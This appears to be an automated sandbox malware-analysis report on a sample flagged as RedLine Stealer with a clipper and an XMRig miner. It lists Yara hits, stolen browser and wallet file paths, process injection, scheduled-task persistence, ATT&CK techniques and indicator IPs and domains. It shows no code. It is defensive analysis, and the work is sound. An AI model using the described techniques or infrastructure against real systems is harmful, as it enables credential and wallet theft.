                  Source: Yara matchFile source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Yara detected Redline ClipperShow sources
                  Source: Yara matchFile source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.sistem.exe.be970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.3.sistem.exe.2910000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.725269917.00000000000BD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000003.724529883.0000000002912000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.917454053.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: sistem.exe PID: 5576, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7016, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)Show sources
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to steal Crypto Currency WalletsShow sources
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: Yara matchFile source: 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR

                  Remote Access Functionality:

                  barindex
                  Yara detected RedLine StealerShow sources
                  Source: Yara matchFile source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid AccountsWindows Management Instrumentation221Windows Service1Windows Service1Disable or Modify Tools11OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default AccountsCommand and Scripting Interpreter12Scheduled Task/Job1Process Injection712Obfuscated Files or Information2Input Capture1File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Software Packing2Security Account ManagerSystem Information Discovery124SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Standard Port11Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery421Distributed Component Object ModelClipboard Data1Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion331LSA SecretsProcess Discovery12SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.commonProcess Injection712Cached Domain CredentialsVirtualization/Sandbox Evasion331VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 553228 Sample: 982d4ea5fee5b8e551d40cb0727... Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 87 Sigma detected: Xmrig 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 12 other signatures 2->93 13 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe 2->13         started        16 services64.exe 2->16         started        process3 signatures4 143 Writes to foreign memory regions 13->143 145 Allocates memory in foreign processes 13->145 147 Injects a PE file into a foreign processes 13->147 18 AppLaunch.exe 15 8 13->18         started        149 Antivirus detection for dropped file 16->149 151 Multi AV Scanner detection for dropped file 16->151 153 Creates a thread in another existing process (thread injection) 16->153 23 conhost.exe 6 16->23         started        process5 dnsIp6 81 95.143.179.185, 31334, 49775 RHTEC-ASrh-tecIPBackboneDE Russian Federation 18->81 83 45.82.70.152, 49778, 49779, 7777 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Netherlands 18->83 69 C:\Users\user\AppData\Local\Temp\sistem.exe, PE32 18->69 dropped 71 C:\Users\user\AppData\Local\...\Microsoft.exe, PE32+ 18->71 dropped 95 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 18->95 97 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->97 99 Tries to harvest and steal browser information (history, passwords, etc) 18->99 101 Tries to steal Crypto Currency Wallets 18->101 25 Microsoft.exe 18->25         started        28 sistem.exe 18->28         started        73 C:\Users\user\AppData\...\sihost64.exe, PE32+ 23->73 dropped 75 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 23->75 dropped 103 Injects code into the Windows Explorer (explorer.exe) 23->103 105 Writes to foreign memory regions 23->105 107 Modifies the context of a thread in another process (thread injection) 23->107 109 2 other signatures 23->109 30 sihost64.exe 23->30         started        32 explorer.exe 23->32         started        file7 signatures8 process9 dnsIp10 119 Antivirus detection for dropped file 25->119 121 Multi AV Scanner detection for dropped file 25->121 123 Writes to foreign memory regions 25->123 35 conhost.exe 4 25->35         started        125 Machine Learning detection for dropped file 28->125 127 Allocates memory in foreign processes 28->127 129 Injects a PE file into a foreign processes 28->129 38 AppLaunch.exe 2 28->38         started        131 Creates a thread in another existing process (thread injection) 30->131 40 conhost.exe 2 30->40         started        79 mine.bmpool.org 32->79 133 System process connects to network (likely due to code injection or exploit) 32->133 135 Query firmware table information (likely to detect VMs) 32->135 signatures11 process12 file13 77 C:\Users\user\AppData\...\services64.exe, PE32+ 35->77 dropped 42 cmd.exe 1 35->42         started        44 cmd.exe 1 35->44         started        process14 signatures15 47 services64.exe 42->47         started        50 conhost.exe 42->50         started        137 Uses schtasks.exe or at.exe to add and modify task schedules 44->137 52 conhost.exe 44->52         started        54 schtasks.exe 1 44->54         started        process16 signatures17 155 Writes to foreign memory regions 47->155 157 Allocates memory in foreign processes 47->157 159 Creates a thread in another existing process (thread injection) 47->159 56 conhost.exe 2 47->56         started        process18 signatures19 111 Injects code into the Windows Explorer (explorer.exe) 56->111 113 Writes to foreign memory regions 56->113 115 Modifies the context of a thread in another process (thread injection) 56->115 117 Injects a PE file into a foreign processes 56->117 59 explorer.exe 56->59         started        63 cmd.exe 1 56->63         started        process20 dnsIp21 85 mine.bmpool.org 157.90.156.89 REDIRISRedIRISAutonomousSystemES United States 59->85 139 System process connects to network (likely due to code injection or exploit) 59->139 141 Query firmware table information (likely to detect VMs) 59->141 65 taskkill.exe 1 63->65         started        67 conhost.exe 63->67         started        signatures22 process23

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe35%VirustotalBrowse
                  982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe100%AviraHEUR/AGEN.1145980
                  C:\Users\user\AppData\Local\Temp\Microsoft.exe100%AviraHEUR/AGEN.1145980
                  C:\Users\user\AppData\Local\Temp\services64.exe100%AviraHEUR/AGEN.1145980
                  C:\Users\user\AppData\Local\Temp\sistem.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\Microsoft.exe53%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\services64.exe53%VirustotalBrowse
                  C:\Users\user\AppData\Local\Temp\sistem.exe31%MetadefenderBrowse
                  C:\Users\user\AppData\Local\Temp\sistem.exe75%ReversingLabsWin32.Infostealer.ClipBanker
                  C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys3%MetadefenderBrowse
                  C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys5%ReversingLabs

                  Unpacked PE Files

                  SourceDetectionScannerLabelLinkDownload
                  19.2.services64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  27.0.explorer.exe.140000000.10.unpack100%AviraHEUR/AGEN.1134782Download File
                  10.0.Microsoft.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.11.unpack100%AviraHEUR/AGEN.1134782Download File
                  19.0.services64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  27.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.3.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.7.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.12.unpack100%AviraHEUR/AGEN.1134782Download File
                  9.2.AppLaunch.exe.400000.0.unpack100%AviraHEUR/AGEN.1124739Download File
                  8.2.sistem.exe.19a5e8.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  28.2.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.13.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.13.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1134782Download File
                  15.2.services64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.2.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.2.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.9.unpack100%AviraHEUR/AGEN.1134782Download File
                  10.2.Microsoft.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1134782Download File
                  22.0.sihost64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  27.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.1.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.4.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.5.unpack100%AviraHEUR/AGEN.1134782Download File
                  27.0.explorer.exe.140000000.0.unpack100%AviraHEUR/AGEN.1134782Download File
                  15.0.services64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.6.unpack100%AviraHEUR/AGEN.1134782Download File
                  8.3.sistem.exe.2910000.0.unpack100%AviraHEUR/AGEN.1124739Download File
                  27.0.explorer.exe.140000000.8.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.11.unpack100%AviraHEUR/AGEN.1134782Download File
                  28.0.explorer.exe.140000000.10.unpack100%AviraHEUR/AGEN.1134782Download File
                  22.2.sihost64.exe.400000.0.unpack100%AviraHEUR/AGEN.1145980Download File
                  28.0.explorer.exe.140000000.12.unpack100%AviraHEUR/AGEN.1134782Download File

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://service.r0%URL Reputationsafe
                  http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                  http://ns.ado/Identq0%Avira URL Cloudsafe
                  http://tempuri.org/0%URL Reputationsafe
                  http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id90%URL Reputationsafe
                  http://tempuri.org/Entity/Id80%URL Reputationsafe
                  http://tempuri.org/Entity/Id50%URL Reputationsafe
                  http://tempuri.org/Entity/Id40%URL Reputationsafe
                  http://tempuri.org/Entity/Id70%URL Reputationsafe
                  http://tempuri.org/Entity/Id60%URL Reputationsafe
                  http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                  http://www.interoperabilitybridges.com/wmp-extension-for-chrome0%URL Reputationsafe
                  http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                  http://support.a0%URL Reputationsafe
                  http://iptc.tc4xmp0%URL Reputationsafe
                  http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                  https://api.ip.sb/ip0%URL Reputationsafe
                  http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id200%URL Reputationsafe
                  http://tempuri.org/Entity/Id210%URL Reputationsafe
                  http://tempuri.org/Entity/Id220%URL Reputationsafe
                  http://tempuri.org/Entity/Id230%URL Reputationsafe
                  http://tempuri.org/Entity/Id240%URL Reputationsafe
                  https://xmrig.com/wizard0%URL Reputationsafe
                  http://tempuri.org/Entity/Id24Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                  http://forms.rea0%URL Reputationsafe
                  http://tempuri.org/Entity/Id100%URL Reputationsafe
                  https://xmrig.com/benchmark/%s0%URL Reputationsafe
                  http://tempuri.org/Entity/Id110%URL Reputationsafe
                  http://tempuri.org/Entity/Id120%URL Reputationsafe
                  http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id130%URL Reputationsafe
                  http://tempuri.org/Entity/Id140%URL Reputationsafe
                  http://tempuri.org/Entity/Id150%URL Reputationsafe
                  http://tempuri.org/Entity/Id160%URL Reputationsafe
                  http://tempuri.org/Entity/Id170%URL Reputationsafe
                  http://tempuri.org/Entity/Id180%URL Reputationsafe
                  http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id190%URL Reputationsafe
                  http://go.mic4m0%Avira URL Cloudsafe
                  http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id8Response0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  mine.bmpool.org
                  		157.90.156.89
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                        		high
                        https://duckduckgo.com/chrome_newtabAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.708004187.000000000829B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735518060.000000000720C000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736492371.000000000748B000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707777380.0000000008147000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707930036.000000000822A000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpfalse
                          		high
                          http://service.rAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpfalse
                              		high
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                		high
                                http://tempuri.org/Entity/Id12ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://ns.ado/IdentqAppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://tempuri.org/AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/Entity/Id2ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                  		high
                                  http://tempuri.org/Entity/Id21ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                    		high
                                    http://tempuri.org/Entity/Id9AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                      		high
                                      http://tempuri.org/Entity/Id8AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://tempuri.org/Entity/Id5AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/PrepareAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                        		high
                                        http://tempuri.org/Entity/Id4AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Entity/Id7AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://tempuri.org/Entity/Id6AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                          		high
                                          https://support.google.com/chrome/?p=plugin_realAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                            		high
                                            http://tempuri.org/Entity/Id19ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licenseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/IssueAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.interoperabilitybridges.com/wmp-extension-for-chromeAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/AbortedAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequenceAppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://support.google.com/chrome/?p=plugin_pdfAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/faultAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2004/10/wsatAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://tempuri.org/Entity/Id15ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, conhost.exe, 0000000B.00000002.747239669.000001B080001000.00000004.00000001.sdmpfalse
                                                              		high
                                                              http://forms.real.com/real/realone/download.html?type=rpsp_usAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://support.aAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/RenewAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://iptc.tc4xmpAppLaunch.exe, 00000001.00000002.733909521.0000000005687000.00000004.00000040.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://tempuri.org/Entity/Id6ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735568362.0000000007222000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://api.ip.sb/ip982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeAppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://support.google.com/chrome/?p=plugin_quicktimeAppLaunch.exe, 00000001.00000002.736195210.00000000073DD000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.735315691.0000000007160000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2004/04/scAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/CancelAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                http://tempuri.org/Entity/Id9ResponseAppLaunch.exe, 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AppLaunch.exe, 00000001.00000002.736578138.00000000074A1000.00000004.00000001.sdmp, AppLaunch.exe, 00000001.00000003.707864542.00000000081B8000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://tempuri.org/Entity/Id20AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://tempuri.org/Entity/Id21AppLaunch.exe, 00000001.00000002.734654158.0000000006F91000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
